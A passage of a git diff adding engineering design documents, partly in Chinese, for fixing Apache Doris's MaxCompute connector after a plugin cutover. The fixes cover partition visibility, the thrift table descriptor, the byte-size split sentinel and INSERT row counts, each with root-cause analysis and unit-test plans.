((PluginDrivenSchemaCacheValue) v).getPartitionColumns()).orElse(emptyList()); +} +@Override public boolean supportInternalPartitionPruned() { return !getPartitionColumns().isEmpty(); } // ⚠见决策① +@Override public Map getNameToPartitionItems(Optional s) { // READ-P3 + if (getPartitionColumns().isEmpty()) return emptyMap(); + List remoteNames = getSchemaCacheValue() + .map(v -> ((PluginDrivenSchemaCacheValue) v).getPartitionColumnRemoteNames()).orElse(emptyList()); + List types = getPartitionColumns().stream().map(Column::getType).collect(toList()); + // 单次远端 round-trip(CACHE-P1 已定:per-query 直连,无二级 cache),mirror MaxComputeExternalMetaCache.loadPartitionValues + ; + List parts = metadata.listPartitions(session, handle, Optional.empty()); + List names=...; List> values=...; // names=p.getPartitionName(); values[i]=remoteNames.map(p.getPartitionValues()::get) + TablePartitionValues tpv = new TablePartitionValues(); + tpv.addPartitions(names, values, types, Collections.nCopies(names.size(), 0L)); // 与 legacy 同一构造(ListPartitionItem, isHive=false) + // invert idToPartitionItem via partitionIdToNameMap(mirror MaxComputeExternalTable:109-113) + return nameToPartitionItem; +} +``` + +### D. `PartitionsTableValuedFunction.analyze()` 双网关 + 守卫(DDL-C1/CACHE-C1) +- SEAM1 catalog allow-list(:172-173):`|| catalog instanceof PluginDrivenExternalCatalog`(**ADD,不删 MaxCompute 分支** 🔴红线)。 +- SEAM2 table-type(:184-185):`, TableType.PLUGIN_EXTERNAL_TABLE`。 +- SEAM3 非分区守卫(:200-204 旁):`else if (table instanceof PluginDrivenExternalTable && !((PluginDrivenExternalTable) table).isPartitionedTable()) throw "Table X is not a partitioned table"`。 +- imports:`PluginDrivenExternalCatalog`、`PluginDrivenExternalTable`。 + +### E. SHOW PARTITIONS — 零改 `ShowPartitionsCommand`(C 的 isPartitionedTable override 自然放行 :263-266;allow-list/dispatch/handler T06c 已接)。 + +## 决策与须显式登记的偏差(Rule 7/12) +- **决策① `supportInternalPartitionPruned()` 改为 keyed-on-partition-columns(非 legacy MC 的无条件 `true`)**: `MaxComputeExternalTable` 是 MC 专属故可 `return true`;`PluginDrivenExternalTable` 被 **jdbc/es/trino + max_compute 共享**,无条件 true 会令非分区连接器从 default false 翻 true(行为变更)。`!getPartitionColumns().isEmpty()` 对 MC 分区表 = true(裁剪恢复),对 MC 非分区表 = false(与 legacy true **可观察等价** —— 无分区列时 `initSelectedPartitions` 本就 NOT_PRUNED),对 jdbc/es/trino = false(零变更)。✅ parent 额外风险(状态不一致)由此规避。 +- **决策② TVF SEAM3 守卫用 `!isPartitionedTable()`(分区列空)而非 legacy MC 的 `getPartitions().isEmpty()`(分区实例空)**: 二者对"有分区列但 0 实例"的空分区表有别 —— legacy 抛 "not a partitioned table",本设计放行返 0 行(与 SHOW PARTITIONS 一致、更正确)。登记为**有意 minor 偏差**(parent 设计 B 已选 isPartitionedTable)。 +- ✅ **parent gap 列名映射**: prop 存 raw 名、schema 存 mapped 名;B 经 `fromRemoteColumnName` 桥接(MC identity 故今等价,通用对 remapping 连接器成立)。 +- ✅ **parent gap NPE 不变式**: `supportInternalPartitionPruned==true` ⇒ `getPartitionColumns` 非空(决策①)⇒ 仅"分区列非空但 0 实例"时 `getNameToPartitionItems` 空。该结构与 legacy MC **完全相同**(MC 亦 supportInternalPartitionPruned=true + 可空 map),空 map ⇒ 空裁剪 ⇒ 无 name 错配 ⇒ 不 NPE。继承 MC 既有安全性,不额外加固(Rule 3)。 +- ✅ **parent gap 性能偏差**: `getNameToPartitionItems` per-call 远端 `listPartitions`(无二级 cache)—— **CACHE-P1 已定的 cutover 方向**(二级 cache 成死代码、改 per-query 直连,一致性更安全),登记。 +- ✅ **parent gap partition_values() TVF 出范围**: `PartitionValuesTableValuedFunction:132-134` 仅支持 HMS('Currently only support hive table'),MC legacy 即抛、非回归、无 Batch-D 红线 → **不动**(区分而非漏;recon 建议加 SEAM4/5 被本设计**否决**,遵 parent 设计 + critic)。 +- ✅ **Batch-D 红线**: 本 fix **新增** `PartitionsTableValuedFunction:173` 旁的 PluginDriven 分支(首次令"T06c 已加"假设成真);Batch-D 删 :173 MaxCompute 分支须**排在本 fix 后**。需更新 Batch-D 设计 :70-77/:102 amendment 措辞("T06c adds"→"FIX-PART-GATES adds")+ decisions-log D-028。 +- **cast 安全**: `getSchemaCacheValue()` 翻闸后恒产 `PluginDrivenSchemaCacheValue`(runtime cache,FE 重启重建,无跨重启旧值);无条件 cast,mirror `MaxComputeExternalTable` cast `MaxComputeSchemaCacheValue` 的既有模式。 + +## Implementation Plan(fe-core only,`-pl :fe-core -am`) +1. [fe-core][new] `PluginDrivenSchemaCacheValue.java`(extends SchemaCacheValue)。 +2. [fe-core] `PluginDrivenExternalTable.java`: initSchema 填分区列(B)+ 4 override(C)+ imports(`Type`/`PartitionItem`/`MvccSnapshot`/`ConnectorPartitionInfo`/`Maps`/`Map`/`Map.Entry`/`Collections`/`stream`)。 +3. [fe-core] `PartitionsTableValuedFunction.java`: SEAM1/2/3 + 2 imports(D)。 +4. [docs] commit ②: Batch-D 设计 amendment 措辞 + decisions-log D-028 ordering(本 fix 先于 Batch-D 删 :173)。 +5. **不涉及**: fe-connector(已 expose partition_columns/listPartition*)、fe-connector-api、be、thrift、`ShowPartitionsCommand`、`PartitionValuesTableValuedFunction`。 + +> ⚠️ **2026-06-08 更正(DG-1 / D-031 / DV-015)**:本「fe-core only / 不涉及 fe-connector-api」scope 声明仅对本 fix 的**实际目标——分区元数据可见性**(SHOW PARTITIONS / partitions TVF / Nereids 能算出 `SelectedPartitions`)成立。它**不**等于「分区裁剪端到端恢复」:read-session `requiredPartitions` 下推(把算出的裁剪集真正喂到 ODPS)需 fe-connector-api(`planScan` 6 参 overload)+ fe-connector-maxcompute + translator 注入,**本 fix 未做**,由后续 **FIX-PRUNE-PUSHDOWN(D-031)** 补齐。原 cutover-review READ-C2 两半修复,本 fix 只落「①元数据 API」半。 + +## Risk +- 回归面: C/D 仅新增 override/分支;非分区连接器经决策① 零变更。`PluginDrivenSchemaCacheValue` cast 仅对 PluginDriven 表(其 initSchema 恒产该子类)。 +- 🔴 Batch-D 红线守住(只增不删 :173)。 +- checkstyle: 新类 license 头 + 新 import 顺序(`Type`/`PartitionItem`/`MvccSnapshot` 等)须过 import-gate。 + +## Test Plan(UT,fe-core,`-pl :fe-core -am`;Rule 9 mutation 自证) +- **`PluginDrivenExternalTablePartitionTest`(新)**: Testable 子类 override `getSchemaCacheValue()` 返 `PluginDrivenSchemaCacheValue`,+ mock catalog→connector→metadata(`listPartitions` 返 2 个 `ConnectorPartitionInfo`)。断言: + - `isPartitionedTable()` true(有分区列)/ false(空);mutation: 改 `!isEmpty`→`false` 令 true 用例红。 + - `getPartitionColumns()` 返正确 Doris 列(mapped 名、顺序)。 + - `getNameToPartitionItems()` key=分区名("p=v"),value=`ListPartitionItem` 含正确值;空分区列→emptyMap。mutation: 用本地名/错列序索引 values 令值断言红。 + - `supportInternalPartitionPruned()` = 有分区列时 true、无时 false(锁决策①;mutation: 无条件 true 令"无分区列"用例红)。 +- **initSchema 分区填充**: 驱动 initSchema(stub connector 返带 `partition_columns` prop 的 `ConnectorTableSchema` + `fromRemoteColumnName`),断言产 `PluginDrivenSchemaCacheValue` 且 partitionColumns/remoteNames 正确(含 raw≠mapped 用例锁列名桥接)。 +- **`PartitionsTableValuedFunctionPluginDrivenTest`(新/扩)**: PluginDriven catalog + PLUGIN_EXTERNAL_TABLE 过 analyze 双网关(不抛 not-allowed/MetaNotFound);非分区 PluginDriven 表抛 "not a partitioned table"。需 CatalogMgr/Env mock(参 DDL routing test 模式)。 +- **扩 `ShowPartitionsCommandPluginDrivenTest`**: 新增驱动 `validate()`/analyze 网关用例(现有用例反射直调 handler 跳网关),分区表不抛、非分区表抛 —— 锁 isPartitionedTable 门(CACHE-C2)。 +- E2E(p2 真实 ODPS,user-run):`test_external_catalog_maxcompute.groovy`/`test_max_compute_schema.groovy`/`test_max_compute_partition_prune.groovy` 的 `show partitions` + 新增 `partitions()` TVF 断言;翻闸态由 FAIL→PASS。CI 默认跳过,守门靠 UT。 + +## 成功标准 +新类 + override + TVF 网关编译过;Checkstyle=0;新/改 UT 全绿且 mutation 自证;Batch-D 红线未破;对抗 review ≤5 轮收敛。 + +## Review 轮次(2 轮收敛) +详见 `plan-doc/reviews/P4-T06d-FIX-PART-GATES-review-rounds.md`。 +- **Round 1** `needs-revision`: 4 findings 全 test-quality(F6/F13/F16 minor + F15 major),production code CLEAN —— TVF 测试 stub 了 `db.getTableOrMetaException(name, types...)` 绕过真实表类型 allow-list,SEAM-2 覆盖 vacuous;正向用例无断言、null 解析可 vacuous 通过。F9(per-call 远端往返)= already-registered-non-goal(本设计 CACHE-P1)。修法 test-only:`invokeAnalyze` 改 `Mockito.mock(DatabaseIf.class, CALLS_REAL_METHODS)` 仅 stub 单参 resolver + `table.getType()`,跑真实 allow-list;正向加 `verify(table).isPartitionedTable()`。 +- **Round 2** `converged`: 3 lens 一致 resolved,无新缺陷。 +- mutation 总账:round-1 4 红(initSchema raw→mapped / getNameToPartitionItems 远端名 / SEAM-3 守卫 / 决策① gating)+ round-2 双红×2(删 allow-list PLUGIN / 删 SEAM-3 块)。最终 UT 38/38、CS=0、BUILD SUCCESS。 + +> **测试实现要点(供防回退)**: TVF analyze 网关测试用 `Mockito.mock(PartitionsTableValuedFunction.class, CALLS_REAL_METHODS)` + 反射调私有 `analyze()`(无实例态);`DatabaseIf` 用 `CALLS_REAL_METHODS` 跑真实 `getTableOrMetaException` 成员检查(仅 stub 单参 resolver + `table.getType()`),使 SEAM-2 非 vacuous;`checkTblPriv` 用 `nullable(ConnectContext.class)` + `any(PrivPredicate.class)` 消两个 5 参重载歧义。 diff --git a/plan-doc/tasks/designs/P4-T06d-FIX-READ-DESC-design.md b/plan-doc/tasks/designs/P4-T06d-FIX-READ-DESC-design.md new file mode 100644 index 00000000000000..f2d746988ee030 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06d-FIX-READ-DESC-design.md @@ -0,0 +1,136 @@ +# P4-T06d — FIX-READ-DESC — focused implementation design + +> Issue: FIX-READ-DESC (阶段 1 blocker of P4-T06d, MaxCompute 翻闸 gap-fix). +> Parent design: `plan-doc/tasks/designs/P4-cutover-fix-design.md` §`### FIX-READ-DESC` +> (incl. its `#### 🔎 对抗 critic — verdict: sound` block). This doc is implementation-ready +> and resolves every correction/gap the critic raised. Date: 2026-06-07. + +## Problem + +After the `max_compute` cutover (T06b), a `max_compute` catalog instantiates as +`PluginDrivenExternalCatalog`. Any `SELECT` over a MaxCompute external table goes through +`PluginDrivenExternalTable.toThrift()` (`fe/fe-core/.../datasource/PluginDrivenExternalTable.java:249`), +which calls `metadata.buildTableDescriptor(...)`. `MaxComputeConnectorMetadata` does **not** +override it, so it hits the SPI default (`ConnectorTableOps.buildTableDescriptor`, +`fe/fe-connector/fe-connector-api/.../ConnectorTableOps.java:146-151`) which returns `null`. +fe-core then falls back to a `TTableType.SCHEMA_TABLE` descriptor **with no `mcTable`** +(`PluginDrivenExternalTable.java:257`). + +BE then static_casts unconditionally to `MaxComputeTableDescriptor` +(`be/src/exec/scan/file_scanner.cpp:1069-1070` for `table_format_type=="max_compute"`), but the +real object is a `SchemaTableDescriptor` → type confusion → crash / garbage endpoint/project/quota/ +credentials. Legacy worked; cutover breaks it. Severity: **blocker**. + +## Root Cause + +Direct cause: `MaxComputeConnectorMetadata` lacks a `buildTableDescriptor` override (unlike +`JdbcConnectorMetadata.java:182-217` / `EsConnectorMetadata.java:121-131`). The dispatch + +SPI hook + null fallback in fe-core are correct and generic; the fix belongs in the MC connector. + +## Design (decisions B1–B4) + +- **B1** — Add `@Override public org.apache.doris.thrift.TTableDescriptor buildTableDescriptor(...)` + to `MaxComputeConnectorMetadata` with the SAME signature as the SPI default. Build a `TMCTable` + and call `setEndpoint(endpoint)`, `setQuota(quota)`, `setProject(dbName)`, `setTable(remoteName)`, + `setProperties(properties)`. `project`/`table` use the **remote-name params** (`dbName`, + `remoteName` are already remote at the call site — see B-registrations OQ-7). Do **not** set + region/access_key/secret_key/public_access/odps_url/tunnel_url (legacy leaves them unset / + deprecated — mirror that; credentials flow through the `properties` map). +- **B2** — Construct + `new org.apache.doris.thrift.TTableDescriptor(tableId, TTableType.MAX_COMPUTE_TABLE, numCols, 0, tableName, dbName)` + then `setMcTable(tMcTable)`. The **6th ctor arg (descriptor dbName field) = remote `dbName` param**, + mirroring legacy `MaxComputeExternalTable.toThrift:318-319` which passes `dbName` there. BE does + NOT read this field for MC reads (JNI scanner uses `TMCTable.project/table`), so it is harmless, + but we mirror legacy faithfully (this diverges from jdbc/es which pass `""` — recorded below). +- **B3** — Extend `MaxComputeConnectorMetadata` ctor with + `private final String endpoint; private final String quota; private final Map properties;` + (reuse existing `java.util.Map` import) + corresponding ctor params; assign them. Update + `MaxComputeDorisConnector.getMetadata` to pass `endpoint, quota, properties`. These fields are + assigned in `doInit()` and `getMetadata()` calls `ensureInitialized()` first, so they are non-null + at construction time. +- **B4** — Style: match the jdbc/es override exactly — fully-qualified `org.apache.doris.thrift.*` + names, **no new thrift imports**. The connector import-gate only forbids fe-core internal packages + and only scans `^import` lines in `src/main/java`; fully-qualified usage trips neither it nor + Checkstyle. The only reused import is `java.util.Map` (already present). + +## Implementation Plan (per file) + +1. `fe/fe-connector/fe-connector-maxcompute/.../MaxComputeConnectorMetadata.java` + - Add three final fields `endpoint`, `quota`, `properties` and extend the ctor with the three + params; assign them. + - Add `@Override buildTableDescriptor(...)` per B1/B2 (fully-qualified thrift names). +2. `fe/fe-connector/fe-connector-maxcompute/.../MaxComputeDorisConnector.java` + - `getMetadata`: `new MaxComputeConnectorMetadata(odps, structureHelper, defaultProject, endpoint, quota, properties)`. +3. No changes to BE, thrift, fe-core, or any other connector. + +Gate: only the connector is touched → `mvn ... -pl :fe-connector-maxcompute` (no `-pl :fe-core`). + +## Risk + +- Low: pure new override + ctor passthrough. No fe-core dispatch / BE / thrift / other-connector + change. jdbc/es/trino unaffected (own override or null fallback). +- Keep-set untouched: legacy `MaxComputeExternalTable.toThrift` stays (unused under cutover; removed + in Batch D). No ordering conflict with this fix. +- BE `descriptors.cpp:289-320` reads region/access_key/... without `__isset` guards, but since we set + the whole `mcTable`, unset fields default to empty strings (not UB) — identical to legacy, which also + does not set them. + +## Test Plan + +- **UT** — new `MaxComputeBuildTableDescriptorTest` in + `fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/`. + Plain JUnit 5 (no fe-core dep, no Mockito). Construct `MaxComputeConnectorMetadata` directly with + `null` odps/structureHelper (ctor only assigns; `buildTableDescriptor` never dereferences them) and + real endpoint/quota/properties/defaultProject. Call `buildTableDescriptor(null, tableId, tableName, + dbName, remoteName, numCols, catalogId)` and assert: (1) result != null; (2) + `getTableType()==MAX_COMPUTE_TABLE`; (3) `isSetMcTable()`; (4) `mcTable.getEndpoint()/getQuota()/ + getProject()==dbName/getTable()==remoteName/getProperties()` equal inputs. Comment encodes WHY: BE + static_casts to `MaxComputeTableDescriptor` and reads these as the auth/addressing contract — a + SCHEMA_TABLE/null fallback crashes BE (Rule 9). The test FAILS if the override returns null or a + SCHEMA_TABLE descriptor. +- **E2E (user-run, live ODPS)** — under cutover, run `test_external_catalog_maxcompute.groovy` / + `test_max_compute_all_type.groovy` `SELECT` with column projection (a real-data SELECT, not just + `count(*)`, per critic gap) against existing `.out` baselines. +- **Build note (both modules).** Run these UTs with `-am` (e.g. + `mvn -f fe/pom.xml -pl :fe-core -am -DfailIfNoTests=false -Dtest=PluginDrivenExternalTableEngineTest test`). + Without `-am`, sibling SNAPSHOT artifacts (incl. the connector-api jar) resolve from a stale + `~/.m2`, causing `NoClassDefFoundError: ConnectorTransaction`. The `-am` reactor build also requires + `-DfailIfNoTests=false` so the `-Dtest=` filter does not fail upstream modules with "No tests were + executed". + +## Parity & boundary registrations + +- **OQ-7 — project/table use remote names (intentional fix).** The SPI read session itself uses + remote names: `PluginDrivenScanNode` builds the table handle from `db.getRemoteName()/table + .getRemoteName()`, and the JNI scanner does `requireNonNull(project)` + `odps.setDefaultProject( + project)`. So the descriptor MUST carry remote names to stay consistent with the read session; + reverting to legacy local names would diverge from the SPI read session. This is the correct, + not merely tolerable, choice (same family as DDL-P3/DDL-C2 remote-name fixes). Note: for the + actual data read the descriptor `project/table` are largely vestigial — real addressing uses the + FE-prebuilt serialized scan session — but they must still be the remote names for consistency and + to satisfy the BE `MaxComputeTableDescriptor` contract. +- **6th ctor arg dbName choice.** We pass the **remote `dbName` param** (mirrors legacy + `MaxComputeExternalTable.toThrift:318-319`), NOT `""` as jdbc/es do. BE does not read + `TTableDescriptor.dbName` for MC reads, so it is harmless; we choose legacy-faithful over + jdbc/es-uniform here, and record the deliberate divergence from the jdbc/es style. +- **UT coverage boundary (now closed — two-sided).** Coverage is split across two modules: + 1. The connector UT (`MaxComputeBuildTableDescriptorTest`) asserts the override's OWN output. It + CANNOT reach the fe-core `PluginDrivenExternalTable.toThrift` call site (cross-module; this + module has no fe-core dependency). + 2. The fe-core call site is now covered by + `PluginDrivenExternalTableEngineTest#testToThriftPassesRemoteNamesAndNumColsToBuildTableDescriptor` + (`fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalTableEngineTest.java`). + It uses a Mockito-mocked `ConnectorMetadata` with an `ArgumentCaptor` on `buildTableDescriptor`, + drives `table.toThrift()` (stubbing only the two Env-backed methods it traverses — + `makeSureInitialized()` and `getFullSchema()` — plus a `TestablePluginCatalog.getConnector()` + override that bypasses Env-backed catalog init), and asserts the captured args: + `dbName == "REMOTE_DB"` (≠ local `mydb`), `remoteName == "REMOTE_TBL"` (≠ local `mytbl`), and + `numCols == schema.size()`. Local names differ from remote names so a regression that passes + local names (or a wrong numCols) FAILS the test (verified by a temporary mutation: + `db.getRemoteName()→db.getFullName()` / `getRemoteName()→getName()` / `size()→size()+1` + produced `expected: but was: `). The previous "e2e-only" claim is superseded: + the call-site wiring is now automated; e2e still covers the live-ODPS end-to-end read. +- **time_zone note.** The BE JNI scanner requires `time_zone`, but BE injects it via the jni_reader + framework (`jni_reader.cpp:151` `_scanner_params.emplace("time_zone", _state->timezone())`) for all + JNI scanners, NOT via the descriptor. So this fix neither needs nor touches `time_zone`. Recorded so + a future change to descriptor properties does not wrongly assume the descriptor must carry it. diff --git a/plan-doc/tasks/designs/P4-T06d-FIX-READ-SPLIT-design.md b/plan-doc/tasks/designs/P4-T06d-FIX-READ-SPLIT-design.md new file mode 100644 index 00000000000000..0ea180d4a13cad --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06d-FIX-READ-SPLIT-design.md @@ -0,0 +1,134 @@ +# P4-T06d — FIX-READ-SPLIT — byte_size split size sentinel + +Status: implemented (not committed). Scope: one-line production change in the MaxCompute +connector + one CI-runnable UT. Sibling of FIX-READ-DESC (already done/committed). + +## Problem +After the `max_compute` cutover (T06b), reads route through the PluginDriven SPI path. With the +**default** split strategy `byte_size` (`MCConnectorProperties.DEFAULT_SPLIT_STRATEGY = +SPLIT_BY_BYTE_SIZE_STRATEGY`), `SELECT count(*)` / `SELECT *` return **silently corrupt data** +(wrong row counts / column values, no error). `row_offset` strategy and the limit-optimization +single-split path are unaffected. + +## Root Cause +BE has no `split_type` field on the wire. `MaxComputeJniScanner` classifies a split purely by the +numeric `split_size` it receives: +- `be/src/format/table/max_compute_jni_reader.cpp:70` → `properties["split_size"] = + std::to_string(range.size)`. +- `MaxComputeJniScanner.java:125-128` → `if (splitSize == -1) BYTE_SIZE else ROW_OFFSET`; then in + `open()` (:207-211) builds `IndexedInputSplit(sessionId, startOffset)` (BYTE_SIZE) or + `RowRangeInputSplit(sessionId, startOffset, splitSize)` (ROW_OFFSET). + +Legacy back-filled the sentinel: `MaxComputeScanNode.java:657-662` → +`MaxComputeSplit(BYTE_SIZE_PATH, splitIndex, /*length=*/-1, /*fileLength=*/splitByteSize, ...)`, +so `rangeDesc.setSize(getLength()) = -1`. + +The cutover connector did NOT: `MaxComputeScanPlanProvider`'s byte_size branch used +`.length(splitByteSize)` (= default 268435456) → `MaxComputeScanRange.populateRangeParams`'s +`rangeDesc.setSize(getLength())` = 268435456. BE sees `split_size != -1`, mis-classifies the +byte_size split as ROW_OFFSET, and reads via `RowRangeInputSplit(..., rowCount=268435456)` → +corrupt data. + +## Design +Restore the legacy sentinel in the byte_size branch only: emit `length = -1`, so +`getLength() → setSize(-1)`. This is byte-exact with legacy `MaxComputeSplit(..., length=-1, +fileLength=splitByteSize, ...)`: +- `setSize = -1` (sentinel) +- `setStartOffset = splitIndex` +- path string = `"[ splitIndex , -1 ]"` (same as legacy `getStart()=splitIndex`, `getLength()=-1`) + +The real byte size is not needed in the range — the byte split was already computed in the ODPS +session (`SplitOptions.SplitByByteSize(...)`); BE reconstructs the split from +`IndexedInputSplit(sessionId, splitIndex)`. The sentinel is a **private contract between the +MaxCompute connector and its BE-side `MaxComputeJniScanner`**, keyed inside the connector's own +`MaxComputeScanRange`/provider (the `getTableFormatType()=="max_compute"` branch), not in any +generic fe-core/PluginDriven layer. No SPI/thrift change. + +row_offset (`:290 .length(count)`) and limit-optimization (`:338 .length(rowsToRead)`) branches are +**unchanged** — they correctly carry the real row count that BE reads as `RowRangeInputSplit` size. + +## Implementation Plan +- `MaxComputeScanPlanProvider.java` byte_size branch (`:272`): `.length(splitByteSize)` → + `.length(-1L)` + a comment that `-1` is the BE BYTE_SIZE/ROW_OFFSET sentinel (mirrors legacy + `MaxComputeScanNode`). DONE. +- `MaxComputeScanRange.java`: **unchanged** — `setSize(getLength())` and `Builder.length` default + (already `-1`) need no edit; the fix flows through naturally. + +## Risk — corrected impact analysis (3 consumers, not 2) +The parent `P4-cutover-fix-design.md` claimed (and grep "fully confirmed") that `getLength()` for a +byte_size range flows ONLY to `setPath` (`MaxComputeScanRange.java:120`) and `setSize` (`:122`). +**That is wrong.** `getLength()` has a THIRD consumer: + +1. `MaxComputeScanRange.populateRangeParams` `setPath` (cosmetic path string `:120`). +2. `MaxComputeScanRange.populateRangeParams` `setSize` (`:122`) — the BE sentinel; the load-bearing + one. +3. `PluginDrivenSplit.java:42` passes `scanRange.getLength()` into `FileSplit.length`, read + downstream by: + - `FederationBackendPolicy.java:499` — `primitiveSink.putLong(split.getLength())` in + consistent-hash backend assignment. + - `FileQueryScanNode.java:430` — `totalFileSize += split.getLength()`. + +After the fix, consumers (1)-(3) see `-1` instead of `268435456`. **This is BENIGN and improves +legacy parity** (legacy `MaxComputeSplit` also used `length=-1`; the buggy cutover diverged from +legacy here too). Concretely: +- (a) **Consistent-hash split→BE placement** will differ from the **current buggy build** (because + the hashed `getLength()` changes from 268435456 to -1). This is invisible/benign for correctness + and matches legacy. Do NOT mistake this A/B placement difference for a regression during + validation. +- (b) **`totalFileSize` goes negative** for byte_size scans (one `-1` per split). This is + pre-existing legacy behavior, used only for stats/cost/explain/logging, not correctness. It + propagates to profile/explain numbers and any cost heuristic keyed on `totalFileSize`. Low risk, + pre-existing. + +Other guarantees (verified): +- Cross-connector impact: **zero**. The sentinel is private to MaxCompute ↔ `MaxComputeJniScanner`; + the change is strictly inside the connector's byte_size branch. jdbc/es/trino/hive/hudi each carry + real file byte sizes, unrelated to this sentinel. (Note: any future generic use of + `ConnectorScanRange.getLength()==-1` by other code paths would need re-examination.) +- No edit-log/replay/HA concern: the change is purely query-plan-time scan-range construction, not + persisted. +- checkstyle / import gate: only a literal-arg change; `-1L` matches existing long-literal style; no + new imports/types. (Verified: 0 violations, import gate clean.) + +## Test Plan +**UT — CI-runnable guard (the only one that runs in normal CI):** +`fe-connector-maxcompute/.../MaxComputeScanRangeTest.java` (JUnit 5; module has no fe-core / no +Mockito). It drives the **provider's real byte_size split-building path** (`buildSplitsFromSession`, +invoked via reflection) with offline Serializable fakes for `TableBatchReadSession` / +`InputSplitAssigner` (returning a real `IndexedInputSplit`), then asserts the produced range's +`rangeDesc.getSize() == -1`. Two tests: +- `byteSizeBranchEmitsMinusOneSizeSentinel` — asserts size == -1 (plus startOffset == splitIndex and + path == `"[ 7 , -1 ]"`). **This guards the provider's CHOICE, not just the range mechanism**: + reverting the byte_size branch to `.length(splitByteSize)` makes it FAIL with + `expected: <-1> but was: <268435456>` (verified by a real revert — see below). +- `rowOffsetBranchKeepsRealRowCount` — contrast: the row_offset branch carries the real row count + (never the -1 sentinel), locking the intent that ONLY byte_size uses -1 (guards against an + over-broad "set everything to -1" fix). + +Each assertion message encodes WHY (Rule 9): BE distinguishes BYTE_SIZE vs ROW_OFFSET solely by +`size == -1`; a wrong value → silent corrupt read. + +**Why provider-level (not the weak range-level UT):** the parent design proposed a UT that builds a +range with `.length(-1)` itself then asserts `getSize()==-1`. That is weak — it sets length=-1 +itself, so it would NOT fail if the provider reverted to `.length(splitByteSize)`; it locks the +range mechanism, not the fix. This UT instead exercises the changed provider line, so it is a real +regression red point. + +**E2E (NOT run in normal CI):** `regression-test/suites/external_table_p2/maxcompute/ +test_external_catalog_maxcompute.groovy` is an `external_table_p2` suite requiring **live +MaxCompute/ODPS credentials**, so it is **SKIPPED in normal CI**. It is therefore NOT an unattended +guard for this fix — the UT above is the only CI-runnable automated guard. Under default byte_size +strategy, the suite's read assertions (count(*), select *, int_types, mc_parts) read corrupt data +before the fix and should match the legacy `.out` baseline after, but this requires a manual / +credentialed run. + +## Boundary notes +- **FIX-READ-SPLIT alone does NOT yield correct reads unless FIX-READ-DESC is also present** + (already done/committed). They are independent blockers on the same read path: FIX-READ-DESC fixes + the table descriptor (endpoint/quota/project/table/properties for BE auth+addressing); + FIX-READ-SPLIT fixes the per-split sentinel. The JNI scanner also requires `time_zone` + (`MaxComputeJniScanner.java:139` `requireNonNull`), injected by the BE JNI framework + (`jni_reader.cpp` `_scanner_params.emplace("time_zone", ...)`) for all JNI scanners — not by the + descriptor; this fix neither helps nor regresses it. +- Production change keeps legacy `MaxComputeScanNode.java` untouched (keep baseline, read-only + reference). diff --git a/plan-doc/tasks/designs/P4-T06d-FIX-WRITE-ROWS-design.md b/plan-doc/tasks/designs/P4-T06d-FIX-WRITE-ROWS-design.md new file mode 100644 index 00000000000000..6e7b6cd010cadf --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06d-FIX-WRITE-ROWS-design.md @@ -0,0 +1,43 @@ +# P4-T06d · FIX-WRITE-ROWS — INSERT affected-rows 恒 0 → doBeforeCommit 回填 loadedRows + +> issue 6 / 6(**最后一个**),phase 4 写回正确性,sev=major,layer=fe-core。来源: `P4-cutover-fix-design.md` §FIX-WRITE-ROWS(:394-420,parent 无 critic 块——本 issue 首次对抗 review)+ review WRITE-P1/WRITE-C1。 +> 据当前代码树核实(行号校正)。 + +## Problem +翻闸后(SPI 事务模型,当前唯一 adopter=MaxCompute),对 PluginDriven 外表 `INSERT INTO ...` 数据被正确写入,但客户端返回 / `SHOW INSERT RESULT` / `fe.audit.log` 的 returnRows 恒为 `affected rows: 0`。触发条件:`connectorTx != null`(SPI 事务模型)的任意 INSERT。JDBC/auto-commit handle 模型(`connectorTx==null`)不受影响。可观察输出回归(数据不丢,行数判读错误)。 + +## Root Cause(行号据当前树) +- `PluginDrivenInsertExecutor.doBeforeCommit()`(`:146-150`,修前)只在 `writeOps != null && insertHandle != null` 时调 `finishInsert`。事务模型下 `insertHandle` 恒 null(`beforeExec():108-113` 事务模型早退,handle 仅 JDBC 分支 `:140` 创建)→ 整段跳过,`loadedRows` 永不赋值。 +- `loadedRows` 字段 `AbstractInsertExecutor.java:69`(`protected long loadedRows = 0`);非事务路径在 `:222` 由 `coordinator.getLoadCounters().get(DPP_NORMAL_ALL)` 赋值。事务模型 BE 的 MaxCompute sink 只经 `TMCCommitData.row_count` 上报,不更新 `num_rows_load_success`(DPP_NORMAL_ALL)→ 取回 0。 +- 下游 `BaseExternalTableInsertExecutor` 用 `loadedRows` 设 setOk/updateReturnRows → 全 0。 +- legacy 基线 `MCInsertExecutor.java:74-78` doBeforeCommit:`loadedRows = transaction.getUpdateCnt()` + `transaction.finishInsert()`。翻闸 restructure 把 finishInsert 等价物(connectorTx.commit 经 txn manager,onComplete)镜像了,**漏镜像 loadedRows 赋值**。历史误判 `P4-T05-T06-cutover-design.md:114`("doBeforeCommit ... null for MC ⇒ correctly skipped")——本设计显式推翻。 + +## Design +在 `doBeforeCommit()` 事务模型分支回填 `loadedRows`,镜像 legacy 可观察行为。**不扩任何 SPI**:`getUpdateCnt()` 全链路已就绪——`ConnectorTransaction.getUpdateCnt()`(default `:96` 返 0)→ `MaxComputeConnectorTransaction.getUpdateCnt()`(`:158-159` = `sum(TMCCommitData.getRowCount())`)。 +- 取法(a,parent 推荐):`connectorTx.getUpdateCnt()`——executor 现有字段在手,无需 `transactionManager.getTransaction(txnId)` 的可失败 lookup;值与 legacy 一致(同一 `TMCCommitData.row_count` 累加链)。 +- keyed on `connectorTx != null`(SPI 事务模型),非 hardcode maxcompute——任何未来事务模型 connector 自动受益;`connectorTx == null` 的 JDBC/auto-commit 路径**字节不变**(继续走 coordinator/DPP_NORMAL_ALL)。 +- 现有 `finishInsert` guard(`writeOps != null && insertHandle != null`)不动;新增分支独立。两分支**互斥**(`connectorTx != null` ⇔ `insertHandle == null`:事务模型从不开 per-statement insert handle),顺序无关。 +- 无 finishInsert 调用:事务模型的提交经 txn manager(onComplete)完成,doBeforeCommit 只补行数。 + +## Implementation Plan +- [fe-core] `PluginDrivenInsertExecutor.java` `doBeforeCommit()`:在 finishInsert guard 后新增 + `if (connectorTx != null) { loadedRows = connectorTx.getUpdateCnt(); }` + 注释。无新 import(`ConnectorTransaction` 已 import `:30`)。 +- 不改 fe-connector-maxcompute / fe-connector-api / be 